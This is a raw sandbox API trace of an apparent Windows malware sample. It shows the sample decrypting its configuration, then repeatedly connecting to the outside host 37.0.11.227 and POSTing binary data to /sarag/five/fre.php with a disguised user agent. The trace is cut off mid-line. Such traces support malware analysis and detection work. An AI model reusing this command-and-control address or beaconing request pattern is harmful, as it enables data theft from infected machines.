GetProcessHeap () returned 0x690000 [0297.551] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0297.565] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.565] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0297.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.566] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0297.567] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.567] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0297.567] GetProcessHeap () returned 0x690000 [0297.567] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0297.568] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.568] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0297.569] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.569] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0297.570] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.570] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0297.570] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.571] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0297.571] GetProcessHeap () returned 0x690000 [0297.571] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0297.571] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0297.571] GetProcessHeap () returned 0x690000 [0297.572] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0297.573] GetProcessHeap () returned 0x690000 [0297.573] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0297.573] GetProcessHeap () returned 0x690000 [0297.578] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0297.578] GetProcessHeap () returned 0x690000 [0297.578] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0297.579] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.579] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0297.587] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.588] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0297.593] GetProcessHeap () returned 0x690000 [0297.593] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0297.594] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.594] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0297.595] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.595] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0297.596] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.596] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0297.596] GetProcessHeap () returned 0x690000 [0297.596] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0297.598] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.598] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0297.599] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.599] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0297.600] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.600] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0297.600] GetProcessHeap () returned 0x690000 [0297.600] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0297.601] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.601] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0297.601] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.602] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0297.602] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.603] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0297.603] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.603] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0297.603] GetProcessHeap () returned 0x690000 [0297.603] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0297.603] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0297.604] GetProcessHeap () returned 0x690000 [0297.604] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab450 [0297.604] socket (af=2, type=1, protocol=6) returned 0x9b4 [0297.604] connect (s=0x9b4, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0297.630] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0297.630] GetProcessHeap () returned 0x690000 [0297.630] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0297.630] GetProcessHeap () returned 0x690000 [0297.630] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0297.631] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0297.632] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0297.632] GetProcessHeap () returned 0x690000 [0297.632] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af440 [0297.632] GetProcessHeap () returned 0x690000 [0297.633] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0297.633] GetProcessHeap () returned 0x690000 [0297.633] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0297.633] GetProcessHeap () returned 0x690000 [0297.633] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0297.633] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0297.634] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0297.634] GetProcessHeap () returned 0x690000 [0297.634] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0297.635] GetProcessHeap () returned 0x690000 [0297.635] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0297.635] send (s=0x9b4, buf=0x6ad508*, len=242, flags=0) returned 242 [0297.637] send (s=0x9b4, buf=0x6aba40*, len=159, flags=0) returned 159 [0297.637] GetProcessHeap () returned 0x690000 [0297.637] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0297.637] recv (in: s=0x9b4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0297.716] GetProcessHeap () returned 0x690000 [0297.717] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0297.722] GetProcessHeap () returned 0x690000 [0297.722] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0297.722] GetProcessHeap () returned 0x690000 [0297.723] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af440 | out: hHeap=0x690000) returned 1 [0297.723] GetProcessHeap () returned 0x690000 [0297.723] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0297.723] closesocket (s=0x9b4) returned 0 [0297.725] GetProcessHeap () returned 0x690000 [0297.725] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab450 | out: hHeap=0x690000) returned 1 [0297.725] GetProcessHeap () returned 0x690000 [0297.725] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0297.725] GetProcessHeap () returned 0x690000 [0297.726] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0297.726] GetProcessHeap () returned 0x690000 [0297.726] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0297.727] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x5f4) returned 0x9b4 [0297.732] Sleep (dwMilliseconds=0xea60) [0297.733] GetProcessHeap () returned 0x690000 [0297.733] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0297.734] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.735] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0297.746] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.746] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0297.758] GetProcessHeap () returned 0x690000 [0297.758] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0297.758] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.759] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0297.759] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.760] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0297.760] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.761] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0297.761] GetProcessHeap () returned 0x690000 [0297.761] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0297.762] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.763] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0297.763] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.767] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0297.768] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.768] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0297.768] GetProcessHeap () returned 0x690000 [0297.768] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0297.769] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.770] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0297.770] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.771] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0297.771] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.772] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0297.772] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.775] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0297.775] GetProcessHeap () returned 0x690000 [0297.775] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0297.775] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0297.775] GetProcessHeap () returned 0x690000 [0297.776] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0297.776] GetProcessHeap () returned 0x690000 [0297.776] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0297.777] GetProcessHeap () returned 0x690000 [0297.777] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0297.777] GetProcessHeap () returned 0x690000 [0297.777] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0297.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.778] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0297.784] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.785] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0297.791] GetProcessHeap () returned 0x690000 [0297.791] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0297.792] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.793] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0297.793] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.794] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0297.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.795] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0297.795] GetProcessHeap () returned 0x690000 [0297.796] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0297.797] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.797] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0297.798] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.798] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0297.799] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.799] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0297.799] GetProcessHeap () returned 0x690000 [0297.799] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0297.800] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.800] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0297.801] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.801] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0297.802] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.803] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0297.803] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.804] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0297.804] GetProcessHeap () returned 0x690000 [0297.804] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0297.804] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0297.804] GetProcessHeap () returned 0x690000 [0297.804] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab470 [0297.804] socket (af=2, type=1, protocol=6) returned 0x9b8 [0297.806] connect (s=0x9b8, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0297.832] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0297.833] GetProcessHeap () returned 0x690000 [0297.833] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0297.833] GetProcessHeap () returned 0x690000 [0297.833] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0297.834] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0297.835] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0297.835] GetProcessHeap () returned 0x690000 [0297.835] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af8c0 [0297.835] GetProcessHeap () returned 0x690000 [0297.835] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0297.835] GetProcessHeap () returned 0x690000 [0297.835] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4460 [0297.835] GetProcessHeap () returned 0x690000 [0297.836] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0297.836] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0297.837] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0297.837] GetProcessHeap () returned 0x690000 [0297.837] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0297.837] GetProcessHeap () returned 0x690000 [0297.838] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0297.838] send (s=0x9b8, buf=0x6ad508*, len=242, flags=0) returned 242 [0297.838] send (s=0x9b8, buf=0x6aba40*, len=159, flags=0) returned 159 [0297.839] GetProcessHeap () returned 0x690000 [0297.839] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0297.839] recv (in: s=0x9b8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0297.917] GetProcessHeap () returned 0x690000 [0297.917] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0297.917] GetProcessHeap () returned 0x690000 [0297.918] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0297.918] GetProcessHeap () returned 0x690000 [0297.918] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af8c0 | out: hHeap=0x690000) returned 1 [0297.918] GetProcessHeap () returned 0x690000 [0297.918] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0297.918] closesocket (s=0x9b8) returned 0 [0297.919] GetProcessHeap () returned 0x690000 [0297.919] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab470 | out: hHeap=0x690000) returned 1 [0297.919] GetProcessHeap () returned 0x690000 [0297.919] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0297.919] GetProcessHeap () returned 0x690000 [0297.920] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0297.920] GetProcessHeap () returned 0x690000 [0297.920] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0297.920] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x598) returned 0x9b8 [0297.922] Sleep (dwMilliseconds=0xea60) [0297.923] GetProcessHeap () returned 0x690000 [0297.923] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0297.924] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.925] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0297.930] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.930] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0297.937] GetProcessHeap () returned 0x690000 [0297.937] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0297.938] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.938] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0297.939] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.939] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0297.940] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.940] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0297.940] GetProcessHeap () returned 0x690000 [0297.941] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0297.963] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.964] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0297.964] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.965] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0297.965] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.966] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0297.966] GetProcessHeap () returned 0x690000 [0297.966] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0297.967] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.967] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0297.968] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.968] StrStrA 